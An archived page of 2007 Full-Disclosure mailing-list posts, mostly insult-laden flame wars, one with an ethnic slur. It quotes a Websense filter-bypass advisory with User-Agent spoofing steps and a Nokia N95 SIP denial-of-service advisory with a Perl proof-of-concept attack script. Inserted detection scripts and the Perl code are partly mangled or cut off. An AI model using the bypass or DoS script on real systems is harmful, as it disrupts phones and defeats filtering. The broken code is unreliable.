Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Fwd: Websense 6.3.1 Filtering Bypass

2007-12-13 Thread reepex
automatic updates with notification? Silent patching? Microsoft tactics?

I also knew websense was a joke but now you have come to this?


On Dec 13, 2007 8:49 AM, Hubbard, Dan [EMAIL PROTECTED] wrote:

 An added note on this...

 Customers do not need to download nor install any new patch for this
 fix. It was automatically updated and installed with our nightly
 protocol signature updates.







 -Original Message-
 From: [EMAIL PROTECTED]
 [mailto:[EMAIL PROTECTED] On Behalf Of The
 Security Community
 Sent: Wednesday, December 12, 2007 3:32 PM
 To: [EMAIL PROTECTED]; Full-Disclosure
 Subject: [Full-disclosure] Fwd: Websense 6.3.1 Filtering Bypass

 Mr. HinkyDink would like to share the following with the Security
 Community...

 -- Forwarded message --
 From:  [EMAIL PROTECTED]
 Date: Dec 12, 2007 6:05 PM
 Subject: Websense 6.3.1 Filtering Bypass
 To: [EMAIL PROTECTED]



 Please share this with your little friends...

 --

 Websense Policy Filtering Bypass
 
 discovered by mrhinkydink


 PRODUCT: Websense Enterprise 6.3.1

 EXPOSURE: Web Filtering Bypass

 SYNOPSIS
 

 By spoofing the User-Agent header it is possible to bypass filtering and,
 to a lesser extent, monitoring in a Websense Enterprise 6.3.1 environment.

 PROOF OF CONCEPT
 

 The following was tested in an unpatched 6.3.1 system using the ISA Server
 integration product.  It is assumed it will work with other integration
 products but this has not been tested.  Other User Agents may also work.

 I.  Install FireFox 2.0.x

 II. Obtain and install the User Agent Switcher browser plug-in by Chris Pederick

 III. Add the following User Agents to the plug-in

 Description: RealPlayer
 User Agent : RealPlayer G2

 Description: MSN Messenger
 User Agent : MSMSGS

 Description: WebEx
 User Agent : StoneHttpAgent

 IV.  Change FireFox's User Agent to any one of the preceding values

 V.   Browse to a filtered Web site

 VI.  Content is allowed

 Content browsed via this method will be recorded in the Websense database
 as being in the Non-HTTP category.

 Demonstration: http://www.youtube.com/watch?v=pKv41ge8XcQ

 SEE ALSO
 
 Websense KnowledgeBase article #976

 The vendor acknowledges this behavior in the aforementioned article.

 WORKAROUND
 ==
 Disable the protocols mentioned above.

 VENDOR RESPONSE
 ===
 Websense has repaired this issue in database #92938

 NOTICE
 ==
 mrhinkydink is not to be confused with the blogger by the same name
 at www.dailykos.com

 c. MMVII mrhinkydink


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
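
The quoted report says spoofed requests are recorded in the Non-HTTP category, which gives a way to look for them after the fact: a media player or messenger User-Agent that pulls HTML pages from several unrelated hosts is behaving like a browser. The detection sketch below is an added example, not part of the report or the thread; the pipe-separated log layout, addresses and host names are constructed and are not Websense's log format.

```python
from collections import defaultdict
from urllib.parse import urlsplit

# User-Agent strings listed in the report above.
SPOOFABLE_AGENTS = {"RealPlayer G2", "MSMSGS", "StoneHttpAgent"}
# Category the report says such traffic is recorded under.
BYPASS_CATEGORY = "Non-HTTP"

# Constructed sample records (hypothetical layout):
# timestamp|client|category|user-agent|content-type|url
SAMPLE_LOG = """\
2007-12-12T18:01:02|10.0.0.21|Non-HTTP|MSMSGS|text/html|http://news.example/
2007-12-12T18:01:09|10.0.0.21|Non-HTTP|MSMSGS|text/html|http://games.example/play
2007-12-12T18:01:30|10.0.0.21|Non-HTTP|MSMSGS|image/png|http://games.example/logo.png
2007-12-12T18:02:11|10.0.0.21|Non-HTTP|MSMSGS|text/html; charset=utf-8|http://video.example/watch
2007-12-12T18:03:00|10.0.0.34|Non-HTTP|RealPlayer G2|audio/x-pn-realaudio|http://radio.example/live.ram
2007-12-12T18:03:05|10.0.0.34|Non-HTTP|RealPlayer G2|text/html|http://radio.example/index.html
2007-12-12T18:04:00|10.0.0.50|News|Mozilla/5.0 (Windows; U) Firefox/2.0|text/html|http://news.example/
malformed line without enough fields
"""


def parse_record(line):
    """Parse one log line into a dict, or return None if it is malformed."""
    parts = line.rstrip("\n").split("|")
    if len(parts) != 6:
        return None
    ts, client, category, agent, ctype, url = (p.strip() for p in parts)
    host = urlsplit(url).hostname
    if not host:
        return None
    # Drop parameters such as "; charset=utf-8" before comparing media types.
    media_type = ctype.split(";")[0].strip().lower()
    return {"ts": ts, "client": client, "category": category,
            "agent": agent, "ctype": media_type, "host": host}


def find_spoofed_agents(log_text, min_hosts=2):
    """Flag (client, agent) pairs that fetched HTML from >= min_hosts hosts
    while logged as Non-HTTP under one of the listed User-Agents."""
    html_hosts = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_record(line)
        if rec is None:
            continue
        if rec["category"] != BYPASS_CATEGORY or rec["agent"] not in SPOOFABLE_AGENTS:
            continue
        if rec["ctype"] == "text/html":
            html_hosts[(rec["client"], rec["agent"])].add(rec["host"])
    return sorted((client, agent, sorted(hosts))
                  for (client, agent), hosts in html_hosts.items()
                  if len(hosts) >= min_hosts)


if __name__ == "__main__":
    for client, agent, hosts in find_spoofed_agents(SAMPLE_LOG):
        print(client, agent, ", ".join(hosts))
```

The `min_hosts` threshold keeps a genuine player that loads one station's landing page from being flagged; tune it against real traffic.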

Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability

2007-12-12 Thread reepex
wow thats quite impressive.. you couldnt exploit a basic overflow and two
years later someone else did

you must be quite proud. Did you tell your family and co workers about this
great finding? I hear tipping point and idefense are hiring you should
forward them this set of emails.

On Dec 12, 2007 2:38 AM, Morning Wood [EMAIL PROTECTED] wrote:

 One of my first advisories and was rediscovered later, turned into a viable
 exploit 2 years after by another researcher.


 http://framework.metasploit.com/exploits/view/?refname=windows:ftp:netterm_netftpd_user


 http://metasploit.com:5/EXPLOITS?MODE=SELECTMODULE=%6e%65%74%74%65%72%6d%5f%6e%65%74%66%74%70%64%5f%75%73%65%72%5f%6f%76%65%72%66%6c%6f%77

 *hugz*


 - Original Message -
 From: reepex [EMAIL PROTECTED]
 To: Morning Wood [EMAIL PROTECTED];
 full-disclosure@lists.grok.org.uk
 Sent: Tuesday, December 11, 2007 1:58 PM
 Subject: Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow
 Vulnerability


  are you serious?
 
 
 http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2003-07/0259.html
 
  I guess you are a 'brain dead india wannabe sec researcher' also?
 
 
  On Dec 11, 2007 6:22 AM, Morning Wood [EMAIL PROTECTED] wrote:
 
  advisories like this are typical of brain dead India wannabe sec researchers
  nuff said
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability

2007-12-11 Thread reepex
are you serious?

http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2003-07/0259.html

I guess you are a 'brain dead india wannabe sec researcher' also?


On Dec 11, 2007 6:22 AM, Morning Wood [EMAIL PROTECTED] wrote:

 advisories like this are typical of brain dead India wannabe sec researchers
 nuff said


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] TOP 10 Vulnerability Trends for 2008

2007-12-11 Thread reepex
is this a serious report or just troll bait?

buzz words, charts and graphs, and nothing technical

is that you gadi?

On Dec 11, 2007 3:48 PM, Sowhat [EMAIL PROTECTED] wrote:


 It's the last month of 2007 and the time is right to look back at the year
 and predict the vulnerability trends for 2008.
 A quick glance at the National Vulnerability Database reveals that there has
 been a disclosure of 5,877 unique vulnerabilities so far this year.
 Nevis Labs has been researching these and developing novel solutions to
 protect its customers.
 Based on our research and documented information, the following are our
 predictions for the TOP 10 vulnerability trends in 2008:

 - ActiveX
 - File Format
 - Antivirus
 - Firewall
 - IM
 - Virtualization
 - VISTA
 - Driver
 - VOIP
 - Mobile

 For details:

 http://www.nevisnetworks.com/content/labs/Top10.pdf




 --
 Sowhat
 http://secway.org
 Life is like a bug, Do you know how to exploit it ?



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (no subject)

2007-12-09 Thread reepex
turned down? should i forward the list the emails where you and that random
from netragard were begging me to work for you?

On Dec 9, 2007 12:17 PM, Simon Smith [EMAIL PROTECTED] wrote:

 Awww, reepex feels bad because he got turned down... ;]

 reepex wrote:
  only simon from snosoft and people from netragard try to hire people
  from FD ;)
 
  apparently they are not too satisfied with their current employees'
 skills
 
  On Dec 9, 2007 12:04 AM, dripping  [EMAIL PROTECTED]
  mailto:[EMAIL PROTECTED] wrote:
 
  And would you like to join my new CYBERSECURITY FIRM?
  We post to mailing lists and advertise like we're not actually
  advertising for ourselves.
 
  reepex wrote:
   I tried responding to your mail but it seems you did not get it so
  maybe you
   will on the list
  
   yes I would LOVE to your join your crew - could you please email
  me your
   silc server and bbs board details?
  
   On Dec 3, 2007 8:00 AM, Gobbles is back 
  [EMAIL PROTECTED] mailto:[EMAIL PROTECTED]
   wrote:
  
   Would you wish to join our crew ?
  
  
  
  
  
  
 
 
 
  


 --

 - simon

 --
 http://www.snosoft.com


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Flash that simulates virus scan

2007-12-09 Thread reepex
the first email from simon asking about where i work following a successful
troll of some random kiddie

On Oct 31, 2007 4:37 PM, Simon Smith [EMAIL PROTECTED] wrote:

 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1

 Reepex,
What company are you with? I'm actually interested in finding
 infosec
 companies that perform real work as opposed to doing everything
 automated. Nice to hear that you're a real tester.

With respect to your question, doesn't msf3 have some of that
 functionality already built into it? Have you already hit all their
 web-apps?

 reepex wrote:
  resulting to se in a pen test cuz you cant break any of the actual
 machines?
 
  lulz
 
  On 10/31/07, Joshua Tagnore [EMAIL PROTECTED] wrote:
  List,
 
  Some time ago I remember that someone posted a PoC of a small site that
  had a really nice looking flash animation that performed a virus scan and
  after the virus scan was finished, the user was prompted for a Download
  virus fix? question. After that, of course, a file is sent to the user and
  he got infected with some malware. Right now I'm performing a penetration
  test, and I would like to target some of the users of the corporate LAN, so
  I think this approach is the best in order to penetrate to the LAN.
 
  I searched google but failed to find the URL, could someone send it to
  me ? Thanks!
 
  Cheers,
  --
  Joshua Tagnore


 - --

 - - simon

 - --
 http://www.snosoft.com


Re: [Full-disclosure] Flash that simulates virus scan

2007-12-09 Thread reepex
my response about a fictional company to keep the game along

On Oct 31, 2007 10:03 PM, reepex [EMAIL PROTECTED] wrote:

 I work at a less known security company that bans use of any automated
 tools unless under extreme circumstances. These include times such as
 when have 1000s of ip addresses all alive and running random windows
 versions so we use mass scans to find any unpatched machines. We
 strictly do not allow 'web scanners' no matter how large the size
 because they are all crap and its quicker to find the bugs yourself
 then verify all the false positives any web app scanner creates.

 How does your company handle these things?

 On 10/31/07, Simon Smith [EMAIL PROTECTED] wrote:
  Reepex,
  What company are you with? I'm actually interested in finding
 infosec
  companies that perform real work as opposed to doing everything
  automated. Nice to hear that you're a real tester.
 
  With respect to your question, doesn't msf3 have some of that
  functionality already built into it? Have you already hit all their
  web-apps?
 
  reepex wrote:
   resulting to se in a pen test cuz you cant break any of the actual
 machines?
  
   lulz
  
   On 10/31/07, Joshua Tagnore [EMAIL PROTECTED] wrote:
   List,
  
   Some time ago I remember that someone posted a PoC of a small
 site that
   had a really nice looking flash animation that performed a virus
 scan and
   after the virus scan was finished, the user was prompted for a
 Download
   virus fix? question. After that, of course, a file is sent to the
 user and
   he got infected with some malware. Right now I'm performing a
 penetration
   test, and I would like to target some of the users of the corporate
 LAN, so
   I think this approach is the best in order to penetrate to the LAN.
  
   I searched google but failed to find the URL, could someone send
 it to
   me ? Thanks!
  
   Cheers,
   --
   Joshua Tagnore
 
 
  - --
 
  - - simon
 
  - --
  http://www.snosoft.com
 

Re: [Full-disclosure] Flash that simulates virus scan

2007-12-09 Thread reepex
the next response where simon describes the shortcomings of his company and
his wish to partner with people who actually know security

On Nov 1, 2007 10:36 AM, Simon Smith [EMAIL PROTECTED] wrote:

 I am eagerly awaiting your response to my question. We're looking for
 companies like yours to partner with because we have a lot of overflow
 work. Or at least, I think we are, you haven't told me what company yet.

 reepex wrote:
  I work at a less known security company that bans use of any automated
  tools unless under extreme circumstances. These include times such as
  when have 1000s of ip addresses all alive and running random windows
  versions so we use mass scans to find any unpatched machines. We
  strictly do not allow 'web scanners' no matter how large the size
  because they are all crap and its quicker to find the bugs yourself
  then verify all the false positives any web app scanner creates.
 
  How does your company handle these things?
 
  On 10/31/07, Simon Smith [EMAIL PROTECTED] wrote:
  Reepex,
  What company are you with? I'm actually interested in finding
 infosec
  companies that perform real work as opposed to doing everything
  automated. Nice to hear that you're a real tester.
 
  With respect to your question, doesn't msf3 have some of that
  functionality already built into it? Have you already hit all their
  web-apps?
 
  reepex wrote:
  resulting to se in a pen test cuz you cant break any of the actual
 machines?
 
  lulz
 
  On 10/31/07, Joshua Tagnore [EMAIL PROTECTED] wrote:
  List,
 
  Some time ago I remember that someone posted a PoC of a small
 site that
  had a really nice looking flash animation that performed a virus
 scan and
  after the virus scan was finished, the user was prompted for a
 Download
  virus fix? question. After that, of course, a file is sent to the
 user and
  he got infected with some malware. Right now I'm performing a
 penetration
  test, and I would like to target some of the users of the corporate
 LAN, so
  I think this approach is the best in order to penetrate to the LAN.
 
  I searched google but failed to find the URL, could someone send
 it to
  me ? Thanks!
 
  Cheers,
  --
  Joshua Tagnore
 
 

 --

 - simon

 --
 http://www.snosoft.com



Re: [Full-disclosure] Flash that simulates virus scan

2007-12-09 Thread reepex
here is adriel from netragard spouting about his lame company that uses
nessusd for all their testing... notice his signature has multiple emails
and phone numbers because he is incapable of passing his cissp

On Nov 1, 2007 9:31 AM, Adriel Desautels [EMAIL PROTECTED] wrote:

 We rely on manual testing for everything. Our philosophy is that
 automation is not nearly as effective as human talent. Human talent
 produces high quality reports.

 What is the name of your company?



 Regards,
Adriel T. Desautels
Chief Technology Officer
Netragard, LLC.
Office : 617-934-0269
Mobile : 617-633-3821
http://www.linkedin.com/pub/1/118/a45

 ---
 Netragard, LLC - http://www.netragard.com  -  We make IT Safe
 Penetration Testing, Vulnerability Assessments, Website Security
 reepex wrote:
  I work at a less known security company that bans use of any automated
  tools unless under extreme circumstances. These include times such as
  when have 1000s of ip addresses all alive and running random windows
  versions so we use mass scans to find any unpatched machines. We
  strictly do not allow 'web scanners' no matter how large the size
  because they are all crap and its quicker to find the bugs yourself
  then verify all the false positives any web app scanner creates.
 
  How does your company handle these things?
 
  On 10/31/07, Simon Smith [EMAIL PROTECTED] wrote:
  Reepex,
  What company are you with? I'm actually interested in finding
 infosec
  companies that perform real work as opposed to doing everything
  automated. Nice to hear that you're a real tester.
 
  With respect to your question, doesn't msf3 have some of that
  functionality already built into it? Have you already hit all their
  web-apps?
 
  reepex wrote:
  resulting to se in a pen test cuz you cant break any of the actual
 machines?
 
  lulz
 
  On 10/31/07, Joshua Tagnore [EMAIL PROTECTED] wrote:
  List,
 
  Some time ago I remember that someone posted a PoC of a small
 site that
  had a really nice looking flash animation that performed a virus
 scan and
  after the virus scan was finished, the user was prompted for a
 Download
  virus fix? question. After that, of course, a file is sent to the
 user and
  he got infected with some malware. Right now I'm performing a
 penetration
  test, and I would like to target some of the users of the corporate
 LAN, so
  I think this approach is the best in order to penetrate to the LAN.
 
  I searched google but failed to find the URL, could someone send
 it to
  me ? Thanks!
 
  Cheers,
  --
  Joshua Tagnore
 
 


Re: [Full-disclosure] on xss and its technical merit

2007-12-09 Thread reepex
after the last email where they asked for a resume i did not feel like
making up a fake resume like i made a fake company so I ignored them... only
3 days later simon sends this email begging me to stay in contact and work
with him

I think snosoft must be in serious trouble if they look to merge with
companies and hire employees based on troll posts from FD

On Nov 5, 2007 10:59 AM, Simon Smith [EMAIL PROTECTED] wrote:

 Thought you were interested in contract work?

 reepex wrote:
  you see you are arguing how useful xss can be for an attacker, but the
  point of this argument is
 
  1) how hard is it find xss in applications
  2) how hard it is to successfully exploit the vulnerability
 
  compared to other vulnerabilities xss is way down on the scale
 
  i also believe this is what pdp wanted to argue as he believes xss is on
  the same scale as other bugs following 1 and 2
 
  On Nov 4, 2007 2:28 PM,  [EMAIL PROTECTED]
  mailto:[EMAIL PROTECTED] wrote:
 
  reepex wrote:
  1) XSS isnt techincal no matter how its used
  I totally disagree with you.. isn't technical for those who cannot
  realize how much powerful can be a xss, especially if persistent.
 
  2) people who use xss on pentests/real hacking/anything but
  phishing are
  lame and only use it because they cannot write real exploits
  (non-web) or
  couldnt find any other web bugs (sql injection, cmd exec,file
  include,
  whatever)
  Imho the pentesting will move day by day closer to web applications
  flaws testing, since the web applications are self written by webmasters
  and more exposed to possible bugs. Concerning sql inj or rfi are not
  more difficult to be discovered..
 
  3) XSS does not have a place on this list or any other security
  list and i
  remember when the idea of making a seperate bugtraq for xss was
  proposed and
  i still think it should be done.
  Dunno about that, even if i agree that all the xss flaws found should
  not be reported here, they would be too much.
 
  4) if you go into a pentest/audit and all you get out is xss then
  its a
  failed pentest and the customer should get a refund.
  I don't agree with this too for the same reasons as before.
 
  5) publishing xss shows your weakness and that you dont have the
  ability to
  find actual bugs ( b/c xss isnt a vuln its crap )
  Imho a xss is a vuln as much as the others, since if used smartly could
  get quite dangerous.
 
  Reading a report from zone-h i read that the most effective hacking
  cause it's the xss.. i don't know if i shall agree with this, but
  obviously it should make us think about it.
 
  bye
 
  /nexus

  



 --

 - simon

 --
 http://www.snosoft.com



Re: [Full-disclosure] (no subject)

2007-12-09 Thread reepex
the emails are sent

your move

On Dec 9, 2007 2:02 PM, Simon Smith [EMAIL PROTECTED] wrote:

 Forward what ever you want, just make sure to edit it first so that you
 don't look like a liar ;)

 dripping wrote:
  I like how he still hasn't responded.
 
  reepex wrote:
  im going to wait for simon to respond ;P
 
  he is really good at making himself look like an idiot
 
  On Dec 9, 2007 1:39 PM, dripping [EMAIL PROTECTED] wrote:
 
  not that i care if this is on/off the list,
  do it * 9000.
 
  reepex wrote:
  turned down? should i forward the list the emails were you and that
  random
  from netragard were begging me to work for you?
 
  On Dec 9, 2007 12:17 PM, Simon Smith [EMAIL PROTECTED] wrote:
 
  Awww, reepex feels bad because he got turned down... ;]
 
  reepex wrote:
  only simon from snosoft and people from netragard try to hire
 people
  from FD ;)
 
  apparently they are not too satisfied with their current employees'
  skills
  On Dec 9, 2007 12:04 AM, dripping  [EMAIL PROTECTED]
  mailto:[EMAIL PROTECTED] wrote:
 
  And would you like to join my new CYBERSECURITY FIRM?
  We post to mailing lists and advertise like we're not actually
  advertising for ourselves.
 
  reepex wrote:
   I tried responding to your mail but it seems you did not get
 it
  so
  maybe you
   will on the list
  
   yes I would LOVE to your join your crew - could you please
 email
  me your
   silc server and bbs board details?
  
   On Dec 3, 2007 8:00 AM, Gobbles is back 
  [EMAIL PROTECTED] mailto:
 [EMAIL PROTECTED]
   wrote:
  
   Would you wish to join our crew ?
  
  
  
  
  
  
 
 
 
  
 
 
 
 
 
 
  --
 
  - simon
 
  --
  http://www.snosoft.com
 
 
 
 
 


 --

 - simon

 --
 http://www.snosoft.com


Re: [Full-disclosure] pcap flow extraction

2007-12-08 Thread reepex
lol I R cant code computer programs to parse simple formats so i beg on
mailing lists to make old cissps feel elite lolololol


On Dec 6, 2007 1:35 AM, Ivan . [EMAIL PROTECTED] wrote:

 Ethereal/wireshark is a no go, as it won't process the file due to size,
 tcpflow is OK, but a little untidy.


SInce I R cannot code computer machine instructions I R incapable of
patching tcpflow to make it untidy lololololol

I make my MSCE degree three weeks ago and now I Am working on phd
lololololol

hire me large security companies for I AM master pc haqr ftw lolcopter

Re: [Full-disclosure] TCP Port randomization paper

2007-12-08 Thread reepex
holy shit batman!

~$ grep -i grsec draft-ietf-tsvwg-port-randomization-00.txt
~$

as stated by the last person its very strange you do not mention grsecurity
in your

Survey of the algorithms in use by some popular implementations


Are you a developer of selinux or a close friend/relative/lover? It is well
known that the selinux developers are in 'grsec/pax denial' (similar to
holocaust denial) and believe that their product, which does protect against
any attacks and leaves many holes for the nsa to exploit in chinese
networks, is superior to pax even though selinux has easily bypassable
stack overflow, kernel vulnerability, and null pointer dereference protections.




On Dec 7, 2007 4:45 PM, Fernando Gont [EMAIL PROTECTED] wrote:

 Vladimir,

 Our draft discusses many port randomization approaches. Some of them were
 taken from existing implementations (e.g., Algorithm 1 was taken from
 OpenBSD).

 However, Algorithm 3 was first described (AFAICT) in Michael Larsen's
 port randomization paper (the first version of our port randomization
 paper), which was published in 2004. As a result of that paper, Algorithm 3
 was implemented in Linux (I'm not sure if this is the implementation you're
 referring to). Algorithm 4 (a slightly improved version of Algorithm 3) was
 first described in an earlier version of our paper, published last year
 (2006).

 In any case, the good thing here is that the IETF has taken this draft as
 a WG item, and thus port randomization will hopefully be recommended for
 TCP, and even for other transport protocols (such as UDP, SCTP, and DCCP),
 as the document has been accepted by the *tsvwg* rather than any
 transport-protocol-specific wg.

 Hopefully, this draft may help to have vendors (those that currently
 don't) introduce port randomization in their stacks.

 Kind regards,
 Fernando





 On Dec 7, 2007 4:15 AM, Vladimir Vitkov  [EMAIL PROTECTED] wrote:

  Strangely enough this stuff exists for more than 3 years ... Think GRSEC
  and more specifically Network stack randomization.
 
  Well of course bow to IETF for accepting this for draft ...
 
  Fernando Gont wrote:
   Folks,
  
   We have published a revision of our port randomization paper. This is
   the first revision of the document since it was accepted as a working
   group item of the tsvwg working group of the IETF (Internet
   Engineering Task Force). Any feedback on the proposed/described
   algorithms will be welcome.
  
   The document is available at:
  
  http://www.ietf.org/internet-drafts/draft-ietf-tsvwg-port-randomization-00.txt
  
   Additionally, it is available in other fancy formats (PDF and HTML)
   at: http://www.gont.com.ar/drafts/port-randomization/index.html
  
   Thanks,
  
   --
   Fernando Gont
   e-mail: [EMAIL PROTECTED] || [EMAIL PROTECTED]
   PGP Fingerprint: 7809 84F5 322E 45C7 F1C9 3945 96EE A9EF D076 FFF1
  
  
  
  
 
  - --
  Regards
  Vladimir Vitkov
  www.hoster.bg
 
  Marijuana will be legal some day, because the many law students
  who now smoke pot will someday become congressmen and legalize
  it in order to protect themselves.
  -- Lenny Bruce
 



Re: [Full-disclosure] (no subject)

2007-12-08 Thread reepex
I tried responding to your mail but it seems you did not get it so maybe you
will on the list

yes I would LOVE to your join your crew - could you please email me your
silc server and bbs board details?

On Dec 3, 2007 8:00 AM, Gobbles is back [EMAIL PROTECTED]
wrote:

 Would you wish to join our crew ?




Re: [Full-disclosure] (no subject)

2007-12-08 Thread reepex
only simon from snosoft and people from netragard try to hire people from FD
;)

apparently they are not too satisfied with their current employees' skills

On Dec 9, 2007 12:04 AM, dripping [EMAIL PROTECTED] wrote:

 And would you like to join my new CYBERSECURITY FIRM?
 We post to mailing lists and advertise like we're not actually
 advertising for ourselves.

 reepex wrote:
  I tried responding to your mail but it seems you did not get it so maybe
 you
  will on the list
 
  yes I would LOVE to your join your crew - could you please email me your
  silc server and bbs board details?
 
  On Dec 3, 2007 8:00 AM, Gobbles is back [EMAIL PROTECTED]
  wrote:
 
  Would you wish to join our crew ?
 
 
 
 
 
  
 

Re: [Full-disclosure] Nokia N95 cellphone remote DoS using the SIP Stack

2007-12-05 Thread reepex
So almighty Phd what is your thesis exactly?

To me it seems to be  'how to run a fuzzer then write crappy perl  scripts
to exploit DoS conditions'

does this properly summarize your phd credentials?

I guess  you could tack on 'after writing the crappy scripts, flood mailing
lists with our crap, and get made fun of'

I am sure you will serve the academic community great one day when teach
hacking classes revolving around the latest editions of hacking exposed



On Dec 5, 2007 11:05 AM, Radu State [EMAIL PROTECTED] wrote:

  Nokia N95 cellphone remote DoS using the SIP Stack



 Severity:

 High – Denial of Service



 Hardware:

 Nokia N95



 Firmware:

 Tested version: Nokia RM-159 V 12.0.013



 Notification:

 Vulnerability found: 11 September 2007

 Contact Nokia Support: 12 September 2007 / None reply Contact Nokia
 Security Support: 19 September 2007 / None reply



 Vulnerability Synopsis:

 If the device has the SIP Phone client activated, a sequence of SIP
 messages turn the device in an inconsistent state where the user is not able
 to operate it anymore until it reboots.



 The sequence of messages consists in 2 different SIP Dialogs where the
 first initiates an INVITE transaction but immediately closes it (in an
 anticipated manner). While, the second transaction initiates a normal INVITE
 transaction that trigger the vulnerability of the target.



 The sequence of messages is illustrated below.



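 X ----------- INVITE -----------------> Nokiav12
 X <---------- 100 Trying -------------- Nokiav12
 X ----------- CANCEL -----------------> Nokiav12
 X <---------- OK (to the Cancel) ------ Nokiav12
 X <---------- 487 Request Terminated -- Nokiav12

 New Dialog

 X ----------- INVITE -----------------> Nokiav12
 X <---------- 100 Trying -------------- Nokiav12
 X <---------- 180 Trying -------------- Nokiav12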



  The device does not work properly anymore 



 Impact:

 A remote entity can take down all the services of the cell phone



 Resolution:

 As we did not get any proper reply from Nokia about the subject, the best
 way will be to disable the SIP Client



 Credits:

 Humberto J. Abdelnur (Ph.D Student)

 Radu State (Ph.D)

 Olivier Festor (Ph.D)



 This vulnerability was identified by the Madynes research team at INRIA
 Lorraine, using KiF the Madynes VoIP fuzzer.

 http://madynes.loria.fr/





 Proof of Concept:



 A perl script (nokiav12.pl) is attached to this mail. Before launching

 it, the SIP phone has to be initialed in the target device



 Command:

 perl nokiav12.pl dst_IP username SourceIp SourceUsername



 Eg. perl nokiav12.pl 192.168.1.119 lupilu 192.168.1.2 tucu





 #!/usr/bin/perl



 ##

 # Vulnerabily discovered using KiF ~ Kiph #

 # #

 # Authors: #

 # Humberto J. Abdelnur (Ph.D Student) #

 # Radu State (Ph.D) #

 # Olivier Festor (Ph.D) #

 # #

 # Madynes Team, LORIA - INRIA Lorraine #

 # http://madynes.loria.fr #

 ##



 use IO::Socket::INET;

 use String::Random;



 die Usage $0 targetIP targetUser attackerIP attackerUser

 unless ($ARGV[3]);



 $targetUser = $ARGV[1];

 $targetIP = $ARGV[0];



 $attackerUser = $ARGV[3];

 $attackerIP= $ARGV[2];



 $socket=new IO::Socket::INET-new(

 Proto='udp',

 PeerPort=5060,

 PeerAddr=$targetIP,

 LocalPort=5060);



 $foo = new String::Random;

 $callid= $foo-randpattern(CCccnCn);

 $cseq = $foo-randregex('\d\d\d\d');



 $sdp = v=0\r

 o=Lupilu 63356722367567875 63356722367567875 IN IP4 $attackerIP\r

 s=-\r

 c=IN IP4 $attackerIP\r

 t=0 0\r

 m=audio 49152 RTP/AVP 96 0 8 97 18 98 13\r

 a=sendrecv\r

 a=ptime:20\r

 a=maxptime:200\r

 a=fmtp:96 mode-change-neighbor=1\r

 a=fmtp:18 annexb=no\r

 a=fmtp:98 0-15\r

 a=rtpmap:96 AMR/8000/1\r

 a=rtpmap:0 PCMU/8000/1\r

 a=rtpmap:8 PCMA/8000/1\r

 a=rtpmap:97 iLBC/8000/1\r

 a=rtpmap:18 G729/8000/1\r

 a=rtpmap:98 telephone-event/8000/1\r

 a=rtpmap:13 CN/8000/1\r

 ;



 $sdplen= length $sdp;



 $msg = INVITE sip:[EMAIL PROTECTED] SIP/2.0\r

 Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r

 From: sip:[EMAIL PROTECTED];tag=1\r

 To: sip:[EMAIL PROTECTED]\r

 Call-ID: [EMAIL PROTECTED]

 CSeq: $cseq INVITE\r

 Max-Forwards: 70\r

 Contact: sip:[EMAIL PROTECTED]\r

 Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY,

 MESSAGE\r

 Content-Type: application/sdp\r

 Content-Length: $sdplen\r

 \r

 $sdp;

 $socket-send($msg);

 $text = '';

 while (not $text =~ /^SIP\/2.0 100(.\r\n)*/ ){

 $socket-recv($text,1024,0);

 }



 $msg = CANCEL sip:[EMAIL PROTECTED] SIP/2.0\r

 Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r

 From: sip:[EMAIL PROTECTED];tag=1\r

 To: sip:[EMAIL PROTECTED];tag=1\r

 Call-ID: [EMAIL PROTECTED]

 CSeq: $cseq CANCEL\r

 Max-Forwards: 70\r

 

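The message sequence in the advisory above, seen from the monitoring side: an added example, not part of the original post or the Madynes team's code, that scans captured SIP requests for an INVITE cancelled almost at once and followed by an INVITE in a new dialog from the same source to the same phone. The time thresholds, helper names and addresses are assumptions, and the capture is constructed.

```python
"""Flag an INVITE that is cancelled at once and followed by a new-dialog INVITE."""
from dataclasses import dataclass, field

CANCEL_WINDOW = 1.0    # assumed: CANCEL within 1 s of its INVITE counts as "immediate"
FOLLOWUP_WINDOW = 5.0  # assumed: a new dialog within 5 s of that CANCEL raises an alert


def parse_request(raw: bytes):
    """Return (method, call_id) for a SIP request; None for responses or junk."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("utf-8", "replace")
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3 or parts[2] != "SIP/2.0":
        return None  # a response starts with "SIP/2.0", so it fails this check
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        # "i" is the compact form of Call-ID defined in RFC 3261
        if sep and name.strip().lower() in ("call-id", "i"):
            return parts[0], value.strip()
    return None


@dataclass
class Detector:
    invites: dict = field(default_factory=dict)       # (src, dst, call_id) -> INVITE time
    early_cancel: dict = field(default_factory=dict)  # (src, dst) -> (CANCEL time, call_id)
    alerts: list = field(default_factory=list)

    def feed(self, ts, src, dst, raw):
        """Process one captured datagram; timestamps must arrive in order."""
        parsed = parse_request(raw)
        if parsed is None:
            return
        method, call_id = parsed
        # Expire state older than the two windows so memory stays bounded.
        self.invites = {k: t for k, t in self.invites.items()
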